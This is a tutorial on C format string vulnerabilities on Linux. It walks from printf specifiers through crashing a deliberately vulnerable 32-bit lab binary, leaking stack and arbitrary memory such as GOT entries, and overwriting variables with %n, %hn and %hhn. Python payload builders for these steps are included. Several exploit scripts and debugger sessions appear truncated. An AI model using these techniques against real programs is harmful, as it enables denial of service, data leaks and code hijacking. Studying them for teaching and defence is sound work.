In many programming languages, a format string is a control parameter used by a class of functions. It tells the function how to render its output, according to the conversion specifications (format specifiers) that the caller supplies.
Here we discuss it on Linux.
Format String Introduction
For C format string functions, characters are usually copied literally into the function’s output, but format specifiers, which start with a `%` character, indicate where and how to translate a piece of data (such as a number) into characters.
We take `printf` as an example.
Format string functions include:
Function | Purpose |
---|---|
scanf | read formatted input from stdin |
printf | write formatted output to stdout |
fprintf | write formatted output to a FILE stream |
vprintf | write to stdout, taking arguments from a va_list |
vfprintf | write to a FILE stream, taking arguments from a va_list |
sprintf | write formatted output to a string |
snprintf | write at most a specified number of chars to a string |
vsprintf | write to a string, taking arguments from a va_list |
vsnprintf | write at most a specified number of chars to a string according to … |
setproctitle | set the process title (argv) |
syslog | write a log message |
err, verr, warn, vwarn, etc. | error and warning output |
The basic format is `%[parameter][flags][field width][.precision][length]type`, and you can check this site for the meaning of each field.
Things we need to focus on:
- parameter
  - `n$`: select a specific parameter of the format string
- flags
- field width
  - minimum width to output
- precision
  - maximum width to output
- length
  - `hh`: output a byte
  - `h`: output a double byte
- type
  - `d`/`i`: signed int
  - `u`: unsigned int
  - `x`/`X`: unsigned int in hex
  - `o`: unsigned int in octal
  - `s`: string (the argument gives the start address)
  - `c`: character
  - `p`: pointer (variable address)
  - `n`: number of characters written so far
  - `%`: a literal `%`
Vulnerability Principle
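`printf` reads the format string one character at a time.
- If the character is not `%`, it is written to stdout.
- If the character is `%`, `printf` reads the next character:
  - If no character follows, it reports an error.
  - If the next character is `%`, it outputs a literal `%`.
  - Otherwise, it parses the specifier and formats the corresponding parameter accordingly.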
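The scanning loop above can be modelled in a few lines of Python. This is only a toy sketch, not how glibc implements `printf`: the name `mini_printf`, the list standing in for the stack, and the small set of supported conversions (`%d`, `%x`, `%s`, `%%`) are assumptions made for illustration.

```python
def mini_printf(fmt, stack):
    """Toy model of printf's scanning loop (hypothetical helper, not glibc).

    `stack` is a list standing in for the words that follow the format
    string pointer. Each conversion consumes the next word, whether or
    not the caller actually supplied an argument.
    """
    out = []
    next_arg = 0
    i = 0
    while i < len(fmt):
        ch = fmt[i]
        if ch != "%":
            out.append(ch)          # ordinary character: copy it through
            i += 1
            continue
        if i + 1 >= len(fmt):
            raise ValueError("format string ends after '%'")
        conv = fmt[i + 1]
        i += 2
        if conv == "%":
            out.append("%")         # "%%" prints a literal percent sign
            continue
        value = stack[next_arg]     # fetch the next word, supplied or not
        next_arg += 1
        if conv == "d":
            out.append(str(value))
        elif conv == "x":
            out.append(format(value, "x"))
        elif conv == "s":
            out.append(str(value))  # a real printf would dereference here
        else:
            raise ValueError("unsupported conversion: %" + conv)
    return "".join(out)


# The caller "forgot" the arguments, so the model prints whatever words
# happen to be on the (made-up) stack.
leftover_stack = [0xFFFFD3A8, 42, 0x8048000]
print(mini_printf("Color %x, Number %d, 100%%", leftover_stack))
```

The point of the model is the line that fetches `stack[next_arg]`: nothing in the loop checks that an argument was really passed for the specifier.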
If we call `printf` incorrectly, like:

    printf("Color %s, Number %d, Float %4.2f");

With no arguments after the format string, `printf` still fetches a value for each specifier from stack memory (from the top of the stack toward the bottom).
On the one hand, if it reads invalid data (for example, `%s` dereferencing a bad address), the program crashes; on the other hand, whatever it prints is leaked stack data.
Format String Exploit
The vulnerability comes from incorrect usage, such as giving no arguments for the format specifiers.
Here is a vulnerable code sample (fmtstr.c):
1 |
|
Compile it as follows (we start with a 32-bit program with protections disabled):

    $ gcc -m32 -fno-stack-protector -no-pie -o fmtstr fmtstr.c

There are 3 ways to exploit:
- program crashing
- memory data leaking
- memory data overwriting
Crash program
The easiest way is to feed many `%s` specifiers so that the program reads from many undefined memory areas.
This may not give you control of the program, but crashing a remote service enables attacks such as denial of service.
But how many `%s` are enough, and why?
We experiment with the `fmtstr` binary compiled above. The relationship between inputs and outputs is:
Input | Output |
---|---|
%s%s%s | %s%s%sW. |
%s%s%s%s%s | %s%s%s%s%sW.(null)(null) |
%s%s%s%s%s%s… | Segmentation fault |
Use gdb to analyze it. Set a breakpoint to debug.

    $ gdb fmtstr -q

Let’s look at the stack. Since no arguments are supplied for the format specifiers, the format string function takes its parameters from the stack.

    ────────────────── stack ────

The current top of the stack is `0xffffd38c`, where `esp` points. The value at `0xffffd390` is the 1st parameter of `printf` (the format string), while the value at `0xffffd394` is the 1st parameter of the format string (the 2nd parameter of `printf`).
We use `%s` to print what the values saved on the stack point to (treating each value as the start address of a string). Let’s see what exactly they point to.

    gef➤ x/x 0xffffd3a8

The output above shows the 1st, 2nd, 3rd, 4th, … parameters in order.
Values on the stack normally differ between machines and between runs. The position of our input, however, is fixed: it is always the 6th parameter, because the stack layout is determined by the program's instructions.
This also tells us how many `%s` are enough to crash the program. Each `%s` we feed prints one item on the stack, and when an item (treated as an address) points somewhere inaccessible, the program crashes.
As we can see, although the 4th and 5th parameters are `0x00000000`, which is certainly an inaccessible address, they are printed as `(null)` instead of being dereferenced. So the first parameter that causes a crash is actually the 6th item, which happens to be the input string itself.
So the answer is that 6 `%s` are just enough (the more the better).
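The counting argument above can be replayed on a model of the stack. This is a rough sketch: the helper `first_crashing_s`, the stack words, and the set of readable addresses are all made up for illustration, and only the shape (two NULL words followed by the input string) follows the text. The one derived value is the 6th word, which is the input `%s%s` read as a little-endian 32-bit integer.

```python
def first_crashing_s(stack_words, readable):
    """Return the 1-based index of the first %s that would fault, or None.

    Models the behaviour described in the text: a NULL pointer prints
    "(null)" instead of being dereferenced; any other address outside
    `readable` is assumed to cause a segmentation fault.
    """
    for index, word in enumerate(stack_words, start=1):
        if word == 0:
            continue                      # printed as "(null)", no crash
        if word not in readable:
            return index                  # dereference of a bad address
    return None


# Hypothetical stack contents, not copied from the gdb session.
input_as_word = int.from_bytes(b"%s%s", "little")
stack_words = [0xFFFFD3A8, 0xFFFFD3A8, 0xF7FFC000, 0x0, 0x0, input_as_word]
readable = {0xFFFFD3A8, 0xF7FFC000}

print(hex(input_as_word), first_crashing_s(stack_words, readable))
```

The input bytes interpreted as an address (`0x73257325`) are assumed to be unmapped here, which is why the 6th `%s` is the first one that faults in this model.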
Leak Memory
It includes the following operations.
- Leak stack memory data
  - Get a variable's value
  - Get the memory that a variable's value (an address) points to
- Leak data at any address
  - Use the `GOT` to get `libc` addresses
  - Dump the whole program
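The basic principle is to use a format like `%n$p` or `%n$x`, or even `%n$s`, to leak data from stack memory. `%p` is a better choice than `%x` for printing data, because `%x` always converts an `unsigned int` (4 bytes) and so truncates pointer-sized values on 64-bit, whereas `%p` prints a full pointer in both 32-bit and 64-bit environments.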
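To make the difference between the two specifiers concrete, here is a small model of what each one would show for the same 64-bit value. It is a sketch under assumptions: the slot value is made up, and the masking mimics what typically happens on x86-64 Linux, where `%x` reads only an `unsigned int`.

```python
slot = 0x00007FFFF7DD18E0  # made-up 64-bit value holding a pointer

as_x = format(slot & 0xFFFFFFFF, "x")   # %x: only the low 32 bits survive
as_p = "0x" + format(slot, "x")         # %p: the full pointer is printed

print(as_x, as_p)
```

With `%x` the upper half of the pointer is lost, so the leaked value cannot be used as an address on a 64-bit target.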
Leak Stack
The format string `%order$p` prints the parameter numbered `order` of the format string. We can use `%10000000$p` to leak the 10000000th parameter, instead of writing 10,000,000 `%p` specifiers as in the previous section. In theory, we can disclose any item on the stack.
Run `fmtstr` to show the effect. I feed it `%6$p` to leak the input string.

    $ gdb fmtstr -q

`%p` prints a pointer, `%x` prints data in hex, and `%s` prints what a pointer points to, so we can use `%s` to do more creative things.
Leak Any
Now we can find our input on the stack, and we have `%s` to leak what a pointer points to. What if we supply an address of our choice as that pointer, and use `%s` to leak what it points to? In theory, we can leak data from anywhere.
The basic exploit format is `addr%order$s`. Because raw address bytes are hard to type on `stdin`, I use `pwntools` to send them.
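The payload layout itself needs nothing beyond the standard library. Below is a minimal sketch, assuming a 32-bit little-endian target whose input is read with `scanf("%s")` and lands at parameter 6 as found earlier. The helper `leak_payload` and the sample address are hypothetical, and `struct.pack` stands in for what `p32` does in `pwntools`.

```python
import struct


def leak_payload(addr, order):
    """Build addr%order$s for a 32-bit little-endian target (illustrative)."""
    packed = struct.pack("<I", addr)
    # Assumption: input is read with scanf("%s"), which stops at
    # whitespace, and printf stops at a NUL byte, so an address with
    # such bytes cannot be placed at the front of the payload.
    bad = set(b"\x00\t\n\x0b\x0c\r ")
    if bad & set(packed):
        raise ValueError("address contains a byte the input path would cut")
    return packed + "%{}$s".format(order).encode()


# 0x0804c010 is a made-up GOT-like address, not taken from the binary.
payload = leak_payload(0x0804C010, 6)
print(payload)
```

The address comes first so that it occupies exactly the stack slot that `%6$s` dereferences. The output then starts with the 4 raw address bytes, followed by the leaked data.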
Leaking `__isoc99_scanf@got` serves to demonstrate that we can leak from anywhere. The exploit script `leakanywhere.py` is:

    from pwn import *

The result of running it:

    $ python leakanywhere.py

The address `0xf7d76a90` appears to be the value stored in `scanf@got` (where `scanf` really is). It changes every time you run the script.
Overwrite Memory
Another impressive format specifier is `%n`. It prints nothing; instead, it stores the number of characters printed so far at the address given by its argument. This gives us a way to write to a chosen location.
The basic principle of overwriting memory is to use a format like `...[overwrite addr]....%[overwrite offset]$n`, where `...` is the padding needed to bring the output up to the desired character count.
We write `overwrite.c` as an example to explore what we can do:
1 |
|
Compile it (32-bit makes it easier to analyze, because a 64-bit program on Linux passes the first 6 arguments in registers).

    $ gcc -m32 -o overwrite overwrite.c -no-pie

Basic
The first aim is to reach `Path 1`. Because `ASLR` is enabled, the address of a stack variable like `c` changes on every run, so here I deliberately have the program print the address of `c`.
Since we need to write `16` to `c`, we need the address of `c`, which we already have, and the order of our input. The exploit is built like this: `[addr][padding]%order$n`.
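The arithmetic behind `[addr][padding]%order$n` can be sketched without `pwntools`. The helper name `write_small_value`, the sample stack address, and the order `6` are assumptions for illustration; a 32-bit little-endian target is assumed as well.

```python
import struct


def write_small_value(addr, value, order):
    """Build [addr][padding]%order$n for a 32-bit little-endian target.

    %n stores the number of characters printed so far, so the 4 address
    bytes plus the padding must add up to `value`.
    """
    packed = struct.pack("<I", addr)
    if value < len(packed):
        raise ValueError("value is smaller than the 4 address bytes")
    padding = b"A" * (value - len(packed))
    return packed + padding + "%{}$n".format(order).encode()


# 0xffffd2fc is a made-up stack address standing in for &c.
payload = write_small_value(0xFFFFD2FC, 16, 6)
print(payload)
```

For the value `16` this yields 4 address bytes and 12 padding characters. The `ValueError` branch marks the limit of this layout: it cannot write a value below 4.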
Determine the order.

    gdb ./overwrite -q

Our input `%p%p%p%p%p%p` is the 6th parameter of the format string (the 7th parameter of `printf`), so `order` should be `6`. The address is contained in the output we receive, so the exploit script goes like this:

    from pwn import *

Finally, we reach `Path 1`.

    $ python path1.py

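Here we use `%012d` instead of 12 literal characters, to show more possibilities. When running, `%012d` is replaced by an integer zero-padded to 12 characters, so together with the 4-byte address, 16 characters are printed before `%n`.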
Advanced
Though `[addr][padding]%order$n` is enough for `Path 1`, what about `Path 2` and `Path 3`?
For `Path 2` we have to set variable `a` to `2`. That is impossible with the format `[addr][padding]%order$n`, because the `[addr]` part alone is already 4 characters, more than 2.
The layout is flexible, though. Move `[addr]` to the end to build `aa%order$n[padding][addr]`, then determine `order`, `[padding]` and `[addr]`.
First check the stack:

    $ gdb ./overwrite -q

`aa%order` occupies the 6th parameter (stack item), and `$n[padding]` should fill the 7th parameter exactly, so that `[addr]` becomes the 8th parameter.
Therefore `order` is `8` and `[padding]` should be 2 chars.
As `a` is a global variable in the `.data` section, and we use `-no-pie` to make the base address static, its address `0x00004024` does not change. So the final exploit should be `aa%8$nxx` followed by `0x00004024`. We still need `pwntools`:

    from pwn import *

Finally, we reach `Path 2`.

    $ python path2.py

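The slot arithmetic for `Path 2` can be checked mechanically. The sketch below is not the article's script: `write_tiny_value` is a hypothetical helper that assumes 4-byte stack slots and input starting at parameter 6, and it uses the address the text gives for `a`. Because the order number appears inside the text that precedes the address, the helper simply tries candidates until the layout is consistent.

```python
import struct

WORD = 4  # bytes per stack slot on a 32-bit target


def write_tiny_value(addr, value, first_order):
    """Build <value chars>%K$n<padding><addr> with the address at the end.

    `first_order` is the parameter index at which the input starts. The
    address must begin on a slot boundary, so K depends on the length
    of the text before it, which in turn contains K.
    """
    prefix = b"a" * value
    for slots in range(1, 16):
        order = first_order + slots
        head = prefix + "%{}$n".format(order).encode()
        if len(head) <= slots * WORD:
            padding = b"x" * (slots * WORD - len(head))
            return head + padding + struct.pack("<I", addr)
    raise ValueError("no consistent layout found")


payload = write_tiny_value(0x00004024, 2, 6)
print(payload)
```

Only the two `a` characters are printed before `%8$n`, so the stored count is 2. The `xx` padding comes after the write and only serves to align the address with the 8th slot.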
The last challenge is `Path 3`, which requires a huge number. Reaching it with padding alone would take about 3.7 billion characters of output (`0xdeadbeef` is 3735928559), so that exploit is unlikely to succeed.
This is where the `hh` and `h` length modifiers come in. What do they mean for `printf` format specifiers?
`h`: it stands for half.
- Specifies that a following d, i, o, u, x, or X conversion specifier applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing); or that a following n conversion specifier applies to a pointer to a short int argument.
`hh`: as a historical guess, it stands for half of a half.
- The same as the `h` explanation, with `short` replaced by `char`.
Combined with `%n`, `%hhn` writes a char-sized value (1 byte) and `%hn` writes a short-sized value (2 bytes). `Path 3` needs `b` to be `0xdeadbeef`, so we can write the bytes one at a time to assemble `0xdeadbeef`.
First get the address of `b`: `0x0804C028`. Then we overwrite memory as follows:

    address hex decimal

We still remember that the `order` is `6`. Build the payload now:

    # since \xad < \xbe < \xde < \xef

This is my solution. I also found a cleverer approach that gives a general method for all problems of this kind (similar to `fmtstr_payload` in `pwntools`):

    def fmt(prev, word, index):

Here is the script to reach `Path 3`:

    from pwn import *

And the result:

    $ python path3.py

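The byte-by-byte idea can also be sketched with the standard library alone. This is an independent illustration, not the article's script or the `pwntools` implementation: `hhn_payload` is a hypothetical helper, a 32-bit little-endian target with input starting at parameter 6 is assumed, and the payload mixes `%Nc` with numbered `%k$hhn` conversions, which is formally undefined and assumed here to be tolerated by glibc.

```python
import struct


def hhn_payload(addr, value, first_order):
    """Write a 32-bit `value` to `addr` one byte at a time with %hhn.

    Layout: four consecutive addresses, then one "%<pad>c%<k>$hhn" pair
    per byte. %hhn stores only the low byte of the running character
    count, so each pad is computed modulo 256.
    """
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    printed = len(payload)                  # 16 characters so far
    for i in range(4):
        target = (value >> (8 * i)) & 0xFF  # little-endian byte order
        pad = (target - printed) % 256
        if pad:
            payload += "%{}c".format(pad).encode()
            printed += pad
        payload += "%{}$hhn".format(first_order + i).encode()
    return payload


payload = hhn_payload(0x0804C028, 0xDEADBEEF, 6)
print(payload)
```

Instead of sorting the bytes in ascending order, this version writes them in address order and lets the count wrap around modulo 256. The total output is a few hundred characters rather than billions.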